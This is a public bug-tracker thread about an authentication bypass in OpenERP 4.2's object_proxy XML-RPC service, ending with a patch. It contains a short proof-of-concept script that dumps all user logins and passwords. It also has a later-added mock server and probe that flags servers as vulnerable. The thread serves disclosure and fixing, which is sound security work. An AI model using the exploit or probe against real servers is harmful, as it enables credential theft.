[4.2] Netsvc object_proxy bypass

Bug #452373 reported by Eduard Carreras i Nadal
This bug affects 1 person
Affects                        | Status       | Importance | Assigned to               | Milestone
Odoo Server (MOVED TO GITHUB)  | Invalid      | Undecided  | Unassigned                |
    4.2 (series)               | Fix Released | High       | Stephane Wirtel (OpenERP) |

Bug Description

It's possible to call any method of the object XML-RPC interface through another interface called object_proxy. The only requisite is that the server is initialised (e.g. someone has logged in or tried to log in).

This is solved in 5.0 but not in 4.2.
In Bazaar, 4.2 is tagged as mature and I can't understand why this patch has not been ported to that branch.

I attach a simple patch that we use on our production servers, some of which are still running the 4.2 version.

Proof of concept:

import xmlrpclib

# Python 2 / xmlrpclib, as in the attached script. The call goes to the
# object_proxy service with no password at all: compare the object service's
# execute(db, uid, passwd, object, method, *args). uid 1 is the admin user.
sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
ids = sock.execute('terp', 1, 'res.users', 'search', [])
f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login', 'password'])
for u in f:
    print ' user: %s pass: %s' % (u['login'], u['password'])

Related branches

Revision history for this message
Eduard Carreras i Nadal (ecarreras) wrote :

Has anyone from the QT seen this bug??
There are a lot of working servers on the Internet that have this bug...

Attaching one of the possible exploits.

visibility: private → public
Revision history for this message
Ravi Gadhia (OpenERP) (rga-openerp) wrote :

Hello Eduard,

Thank you for your interest.

We have tried the workaround suggested by you.
When we work through your patch, it gives an xmlrpclib.ProtocolError: <ProtocolError for localhost:8069/xmlrpc/object_proxy: 404 Not Found> error.

If I change it to object (i.e. xmlrpclib.ServerProxy('http://%s:%d/xmlrpc/object' % (host, int(port)))), it works and creates the socket.

But when I try sock.execute, it gives us an AccessDenied error, which is quite obvious.

The code:
f = sock.execute(dbname, 1, 'res.users', 'search', [])

Here it will definitely give you an access error because the arguments do not match.
Look at the definition:
execute(self, db, uid, passwd, object, method, *args).

However, we would be honoured to get more appropriate information from you and will sort out this issue very soon.

Thank you again.
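Ravi's point about the argument list and the reporter's PoC come down to the same thing: the object service's execute() carries a password and checks it, while the object_proxy service reaches the same backend without one, so the PoC's argument list is correct for object_proxy and wrong (hence AccessDenied) for object. The following is an added example, not OpenERP's or Odoo's code and not the attached patch: a self-contained Python 3 mock of both services plus a probe that classifies a server the way commenters in this thread saw it (the user list when the bypass works, HTTP 404 when object_proxy is not served, an AccessDenied fault from the authenticated service, or a connection reset). The service signatures, the res.users stand-in with plaintext passwords, the AccessDenied class and the verdict strings are assumptions made for illustration.

```python
"""Added example (not OpenERP/Odoo code): a local model of the object vs
object_proxy XML-RPC services and a probe for the unauthenticated path.

Assumptions, made for illustration only:
  - /xmlrpc/object serves execute(db, uid, passwd, model, method, *args)
    and checks passwd before dispatching (the signature Ravi quotes).
  - /xmlrpc/object_proxy serves execute(db, uid, model, method, *args)
    with no password at all, the call shape the reporter's PoC uses.
  - USERS is a constructed stand-in for res.users.
"""
import threading
import xmlrpc.client
from http.client import RemoteDisconnected
from xmlrpc.server import (MultiPathXMLRPCServer, SimpleXMLRPCDispatcher,
                           SimpleXMLRPCRequestHandler)

# Constructed sample data standing in for res.users (plaintext passwords,
# which is what the PoC output in the report reads back).
USERS = {
    1: {"id": 1, "login": "admin", "password": "admin"},
    2: {"id": 2, "login": "demo", "password": "demo"},
}


class AccessDenied(Exception):
    """Raised by the authenticated service; the client sees it as a Fault."""


class Models:
    """Minimal ORM stand-in: only res.users, only search and read."""

    def execute(self, db, uid, model, method, *args):
        if model != "res.users":
            raise ValueError("unknown model %s" % model)
        if method == "search":
            return sorted(USERS)
        if method == "read":
            ids, fields = args[0], args[1]
            return [{f: USERS[i][f] for f in fields} for i in ids]
        raise ValueError("unknown method %s" % method)


def object_dispatcher(models):
    """/xmlrpc/object: the password is checked against USERS before dispatch."""
    d = SimpleXMLRPCDispatcher()

    def execute(db, uid, passwd, model, method, *args):
        user = USERS.get(uid)
        if user is None or user["password"] != passwd:
            raise AccessDenied("AccessDenied")
        return models.execute(db, uid, model, method, *args)

    d.register_function(execute, "execute")
    return d


def object_proxy_dispatcher(models):
    """/xmlrpc/object_proxy: same backend, no credential in the signature."""
    d = SimpleXMLRPCDispatcher()

    def execute(db, uid, model, method, *args):  # no passwd: the bypass
        return models.execute(db, uid, model, method, *args)

    d.register_function(execute, "execute")
    return d


class Handler(SimpleXMLRPCRequestHandler):
    """Answer 404 for any path without a registered dispatcher."""

    def is_rpc_path_valid(self):
        return self.path in self.server.dispatchers


def start_server(expose_proxy):
    """Serve on an ephemeral port; expose_proxy=False models a build that
    no longer serves object_proxy at all (the 404 Ravi reports)."""
    srv = MultiPathXMLRPCServer(("127.0.0.1", 0), Handler, logRequests=False)
    models = Models()
    srv.add_dispatcher("/xmlrpc/object", object_dispatcher(models))
    if expose_proxy:
        srv.add_dispatcher("/xmlrpc/object_proxy", object_proxy_dispatcher(models))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def call_execute(endpoint, *params):
    """One execute() call, classified as the thread's commenters saw it:
    'ok', 'not-exposed' (HTTP 404), 'denied' (AccessDenied fault),
    'reset' (connection reset by peer) or 'error'."""
    sock = xmlrpc.client.ServerProxy(endpoint)
    try:
        return ("ok", sock.execute(*params))
    except xmlrpc.client.ProtocolError as e:
        return ("not-exposed" if e.errcode == 404 else "error", None)
    except xmlrpc.client.Fault as e:
        return ("denied" if "AccessDenied" in e.faultString else "error", None)
    except (ConnectionResetError, RemoteDisconnected):
        return ("reset", None)
    except OSError:
        return ("error", None)


def probe(base_url, db="terp"):
    """The reporter's PoC against object_proxy: uid 1, no password anywhere.
    Returns ('vulnerable', rows) when the user table comes back."""
    ep = base_url + "/xmlrpc/object_proxy"
    verdict, ids = call_execute(ep, db, 1, "res.users", "search", [])
    if verdict != "ok":
        return (verdict, None)
    verdict, rows = call_execute(ep, db, 1, "res.users", "read", ids,
                                 ["id", "login", "password"])
    return ("vulnerable" if verdict == "ok" else verdict, rows)


if __name__ == "__main__":
    for exposed in (True, False):
        srv = start_server(exposed)
        url = "http://127.0.0.1:%d" % srv.server_address[1]
        print("object_proxy served:", exposed, "->", probe(url))
        srv.shutdown()
        srv.server_close()
```

Sending the PoC's five-argument list to /xmlrpc/object instead of /xmlrpc/object_proxy binds 'res.users' to passwd and 'search' to model, so the password check fails and the call is denied; that is the result Ravi describes, and it says nothing about whether object_proxy itself is exposed. The probe has to be pointed at object_proxy on a server that actually serves it.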

Changed in openobject-server:
status: New → Incomplete
Changed in openobject-server:
status: Incomplete → Invalid
Revision history for this message
Eduard Carreras i Nadal (ecarreras) wrote :

Today, 4 months later, the vulnerability is still there...

I re-attach the exploit...

Revision history for this message
Cristian Salamea (ovnicraft) wrote :

Hi, I tested on stable revno 2041 and the exploit is invalid

Revision history for this message
Nhomar - Vauxoo (nhomar) wrote : Re: [Bug 452373] Re: [4.2] Netsvc object_proxy bypass

I tried to use this and I cannot replicate this bug, can you guide me
please!

2010/4/26 Eduard Carreras i Nadal <email address hidden>

> Today, 4 months after the vulnerability still there...
>
> I re-attach the exploit...
>
> ** Attachment added: "get_all_users_pass.py"
> http://launchpadlibrarian.net/45524184/get_all_users_pass.py

--
Saludos Cordiales

Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://geronimo.com.ve
Servicios IT: http://openerp.netquatro.com
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>

Revision history for this message
Nhomar - Vauxoo (nhomar) wrote :

Hi....

          ./get_all_users_pass.py "nueva_2"
Traceback (most recent call last):
  File "./get_all_users_pass.py", line 27, in <module>
    db_list = dbsock.list()
  File "/usr/lib/python2.6/xmlrpclib.py", line 1199, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib/python2.6/xmlrpclib.py", line 1489, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.6/xmlrpclib.py", line 1237, in request
    errcode, errmsg, headers = h.getreply()
  File "/usr/lib/python2.6/httplib.py", line 1048, in getreply
    response = self._conn.getresponse()
  File "/usr/lib/python2.6/httplib.py", line 974, in getresponse
    response.begin()
  File "/usr/lib/python2.6/httplib.py", line 391, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python2.6/httplib.py", line 349, in _read_status
    line = self.fp.readline()
  File "/usr/lib/python2.6/socket.py", line 397, in readline
    data = recv(1)
socket.error: [Errno 104] Connection reset by peer

on revno: 1999

2010/4/26 Cristian Salamea (GnuThink) <email address hidden>

> Hi, i tested in stable revno.2041 and the xploit is invalid

Revision history for this message
Eduard Carreras i Nadal (ecarreras) wrote :

This is a 4.2 *only* exploit... as you can see in the description and in the related branches

Revision history for this message
Cristian Salamea (ovnicraft) wrote :

Again, I tested with the 4.2 version as Eduard told me via IRC, and it works: it shows all users and passwords from the server

Changed in openobject-server:
status: Invalid → Confirmed
importance: Undecided → High
status: Confirmed → Invalid
Revision history for this message
Eduard Carreras i Nadal (ecarreras) wrote :

@Nhomar only *4.2*

Changed in openobject-server:
importance: High → Undecided
Revision history for this message
Stephane Wirtel (OpenERP) (stephane-openerp) wrote :

Hi all,

You can find the patch in this revision.

revision-id: <email address hidden>
date: 2010-04-27 08:29:46 +0200
build-date: 2010-04-27 08:31:05 +0200
revno: 28
branch-nick: server

Thank you so much.

This report contains Public Security information; everyone can see it.